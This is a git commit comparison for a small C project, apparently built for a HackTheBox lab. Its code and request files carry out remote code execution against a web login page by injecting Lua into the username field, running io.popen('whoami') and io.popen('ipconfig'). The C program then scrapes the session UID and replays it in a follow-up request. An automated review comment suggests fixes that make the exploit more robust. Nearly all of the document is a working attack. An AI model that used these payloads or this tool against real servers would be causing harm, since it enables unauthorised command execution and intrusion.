Compare commits


10 Commits

Author SHA1 Message Date
hexplor 2c0ce64926 add 2026-04-26 04:29:53 +02:00
hexplor 0ad306159e update rce working 2026-04-26 04:16:48 +02:00
hexplor 2ca0abe734 update 2026-04-26 04:10:02 +02:00
hexplor 904f9d9ddb update 2026-04-26 02:45:06 +02:00
hexplor 32bfca70b2 update 2026-04-26 02:30:32 +02:00
hexplor 361653d5e1 update 2026-04-26 00:41:52 +02:00
hexplor 6e89f36a5b update payload 2026-04-25 23:24:12 +02:00
hexplor ba426950ae updte 2026-04-25 23:14:49 +02:00
hexplor 194309a3bf upate 2026-04-25 22:22:27 +02:00
hexplor 8177d657a1 ajout de payload.txt 2026-04-25 02:21:13 +02:00
6 changed files with 292 additions and 41 deletions
+2
@@ -0,0 +1,2 @@
exploit
exploit.o
+2 -2
@@ -1,7 +1,7 @@
EXEC = exploit
$(EXEC): exploit.o
gcc -o $(EXEC) exploit.o
gcc -g -o $(EXEC) exploit.o
exploit.o: exploit.c
gcc -c exploit.c
gcc -g -c exploit.c
+23
@@ -0,0 +1,23 @@
POST /loginok.html HTTP/1.1
Host: localhost
Content-Length: 65
Cache-Control: max-age=0
sec-ch-ua: "Not-A.Brand";v="24", "Chromium";v="146"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Accept-Language: fr-FR,fr;q=0.9
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/login.html?lang=french
Accept-Encoding: gzip, deflate, br
Cookie: client_lang=french
Connection: keep-alive
username=anonymous%00]]%0dlocal+h+%3d+io.popen("whoami")%0dlocal+r+%3d+h%3aread("*a")%0dh%3aclose()%0dprint(r)%0d--&password=&username_val=anonymous&password_val=
+225 -39
@@ -3,47 +3,233 @@
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
int main(int argc, char** argv){
if (argc != 2){
printf("u must specifie IP addr\n");
exit(1);
}
printf("target = %s\n", argv[1]);
int domain = AF_INET;
int type = SOCK_STREAM;
int fd = socket(domain, type, 0);
printf("fd = %d\n", fd);
void envoie_request(void);
void recevoir_request(void);
void recup_uid(void);
struct sockaddr_in dest_addr;
memset(&dest_addr, 0, sizeof(dest_addr));
dest_addr.sin_family = AF_INET;
dest_addr.sin_port = htons(80);
dest_addr.sin_addr.s_addr = inet_addr(argv[1]);
int creer_et_connecter_socket(const char* ip_addr) {
int domain = AF_INET;
int type = SOCK_STREAM;
int fd = socket(domain, type, 0);
if (fd < 0) {
printf("Erreur création socket\n");
return -1;
}
printf("fd = %d\n", fd);
struct sockaddr_in dest_addr;
memset(&dest_addr, 0, sizeof(dest_addr));
dest_addr.sin_family = AF_INET;
dest_addr.sin_port = htons(80);
dest_addr.sin_addr.s_addr = inet_addr(ip_addr);
int ret = connect(fd,(struct sockaddr*)&dest_addr, sizeof(dest_addr));
printf("ret_connect = %d\n", ret);
char buffer[100];
memset(buffer, 0, 100);
strncpy(buffer, "GET /login.html HTTP/1.1\r\n", 100);
send(fd, buffer, strlen(buffer), 0);
strncpy(buffer, "Host: ftp.wingdata.htb\r\n", 100);
send(fd, buffer, strlen(buffer), 0);
strncpy(buffer, "Accept: */*\r\n", 100);
send(fd, buffer, strlen(buffer), 0);
strncpy(buffer, "\r\n", 100);
send(fd, buffer, strlen(buffer), 0);
int n;
while (( n = recv(fd, buffer, 99, 0)) > 0){
buffer[n] = 0;
printf("%s", buffer);
}
return 0;
int ret = connect(fd, (struct sockaddr*)&dest_addr, sizeof(dest_addr));
if (ret < 0) {
printf("Erreur connexion\n");
close(fd);
return -1;
}
printf("ret_connect = %d\n", ret);
return fd;
}
void envoyer_requete(int fd, const char* fichier_requete) {
FILE* fichier_out = fopen(fichier_requete, "r");
if (!fichier_out) {
printf("Erreur ouverture fichier: %s\n", fichier_requete);
return;
}
fseek(fichier_out, 0, SEEK_END);
long size = ftell(fichier_out);
char* file_buffer = malloc(size + 1);
fseek(fichier_out, 0, SEEK_SET);
fread(file_buffer, 1, size, fichier_out);
file_buffer[size] = '\0';
printf("\n--- Envoi requête depuis %s ---\n", fichier_requete);
for (int i = 0; i < size; i++) {
char c = file_buffer[i];
if (c == '\n')
send(fd, "\r\n", 2, 0);
else
send(fd, &c, 1, 0);
}
send(fd, "\r\n", 2, 0);
free(file_buffer);
fclose(fichier_out);
}
void recevoir_reponse(int fd, char** reponse, int* taille) {
char c = 0;
int n = 0;
char* text = calloc(1, 1);
int len = 0;
printf("\n--- Réponse reçue ---\n");
struct timeval tv;
tv.tv_sec = 5;
tv.tv_usec = 0;
setsockopt(fd, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof(tv));
while ((n = recv(fd, &c, 1, 0)) > 0) {
printf("%c", c);
len = strlen(text) + 2;
text = realloc(text, len);
text[len - 2] = c;
text[len - 1] = 0;
}
printf("\n--- Fin réponse ---\n");
*reponse = text;
*taille = len;
}
char* extraire_uid(const char* reponse) {
int index = 0;
char* uid = malloc(400);
memset(uid, 0, 400);
while (reponse[index]) {
if (reponse[index] == 'U') {
if (strncmp(reponse + index, "UID=", 4) == 0) {
printf("\nPattern UID= trouvé\n");
index += 4;
int j = 0;
while (reponse[index] && reponse[index] != ';' &&
reponse[index] != '\r' && reponse[index] != '\n') {
uid[j] = reponse[index];
j++;
index++;
}
uid[j] = 0;
break;
}
}
index++;
}
if (strlen(uid) == 0) {
printf("UID non trouvé dans la réponse\n");
free(uid);
return NULL;
}
printf("UID extrait = %s\n", uid);
return uid;
}
void envoyer_requete_dir_avec_token(int fd, const char* fichier_requete, const char* uid) {
FILE* fichier_out = fopen(fichier_requete, "r");
if (!fichier_out) {
printf("Erreur ouverture fichier: %s\n", fichier_requete);
return;
}
fseek(fichier_out, 0, SEEK_END);
long size = ftell(fichier_out);
char* file_buffer = malloc(size + 1);
fseek(fichier_out, 0, SEEK_SET);
fread(file_buffer, 1, size, fichier_out);
file_buffer[size] = '\0';
printf("\n--- Envoi requête DIR avec UID: %s ---\n", uid);
for (int i = 0; i < size; i++) {
char c = file_buffer[i];
printf("%c", c);
if (c == 'U') {
if (strncmp(file_buffer + i, "UID=", 4) == 0) {
send(fd, file_buffer + i, 4, 0);
send(fd, uid, strlen(uid), 0);
send(fd, "\r\n", 2, 0);
printf("ID=%s", uid);
i += 3;
continue;
}
}
else if (c == '\n') {
send(fd, "\r\n", 2, 0);
}
else {
send(fd, &c, 1, 0);
}
}
send(fd, "\r\n\r\n", 4, 0);
free(file_buffer);
fclose(fichier_out);
}
int main(int argc, char** argv) {
if (argc != 2) {
printf("Tu dois spécifier l'adresse IP\n");
exit(1);
}
printf("target = %s\n", argv[1]);
printf("\n========== PREMIÈRE REQUÊTE (RCE) ==========\n");
int fd = creer_et_connecter_socket(argv[1]);
if (fd < 0) {
exit(1);
}
envoyer_requete(fd, "request_rce.txt");
char* reponse1 = NULL;
int taille1 = 0;
recevoir_reponse(fd, &reponse1, &taille1);
char* uid = extraire_uid(reponse1);
close(fd);
if (!uid) {
printf("Impossible d'extraire l'UID, arrêt du programme\n");
free(reponse1);
exit(1);
}
printf("\nUID récupéré avec succès: [%s]\n", uid);
printf("\n========== DEUXIÈME REQUÊTE (DIR) ==========\n");
int fd2 = creer_et_connecter_socket(argv[1]);
if (fd2 < 0) {
free(uid);
free(reponse1);
exit(1);
}
envoyer_requete_dir_avec_token(fd2, "request_dir_with_token.txt", uid);
char* reponse2 = NULL;
int taille2 = 0;
recevoir_reponse(fd2, &reponse2, &taille2);
if (reponse2 && strlen(reponse2) > 0) {
printf("\n--- RÉPONSE DIR COMPLÈTE ---\n");
printf("%s\n", reponse2);
} else {
printf("\nAucune réponse reçue pour la requête DIR\n");
}
close(fd2);
free(uid);
free(reponse1);
free(reponse2);
return 0;
}
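Review bot: In `extraire_uid`, the inner copy loop writes `uid[j]` with no upper bound even though `uid` is a fixed `malloc(400)` allocation, so a response whose `UID=` value is longer than 399 bytes (this is data read off the socket in `recevoir_reponse`, not something the client controls) overruns the heap; the condition should become `while (j < 399 && reponse[index] && reponse[index] != ';' && reponse[index] != '\r' && reponse[index] != '\n') {`. `recevoir_reponse` also does `text = realloc(text, len);` for every received byte, which leaks the buffer and then writes through a NULL pointer on the next line if `realloc` fails, and the per-iteration `strlen(text)` makes accumulation quadratic; track the length in `len` and assign through a temporary (`char *tmp = realloc(text, len); if (!tmp) break; text = tmp;`). In `envoyer_requete` and `envoyer_requete_dir_avec_token`, the `ftell`, `malloc` and `fread` results are unchecked before `file_buffer[size] = '\0'`, so a failed `ftell` (-1) turns into `malloc(0)` followed by a write at `file_buffer[-1]`, and a short read leaves uninitialized bytes that are then sent. The hunk starts at file line 3, so the socket and address includes preceding `#include <stdio.h>` are outside this view.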
+17
@@ -0,0 +1,17 @@
POST /dir.html HTTP/1.1
Host: localhost
sec-ch-ua-platform: "Windows"
Accept-Language: fr-FR,fr;q=0.9
sec-ch-ua: "Not-A.Brand";v="24", "Chromium";v="146"
Content-Type: application/x-www-form-urlencoded
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36
Accept: */*
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/main.html
Accept-Encoding: gzip, deflate, br
Cookie: client_lang=french; viewmode=0; UID=
Connection: keep-alive
+23
@@ -0,0 +1,23 @@
POST /loginok.html HTTP/1.1
Host: localhost
Content-Length: 65
Cache-Control: max-age=0
sec-ch-ua: "Not-A.Brand";v="24", "Chromium";v="146"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Accept-Language: fr-FR,fr;q=0.9
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/login.html?lang=french
Accept-Encoding: gzip, deflate, br
Cookie: client_lang=french
Connection: keep-alive
username=anonymous%00]]%0dlocal+h+%3d+io.popen("ipconfig")%0dlocal+r+%3d+h%3aread("*a")%0dh%3aclose()%0dprint(r)%0d--&password=&username_val=anonymous&password_val=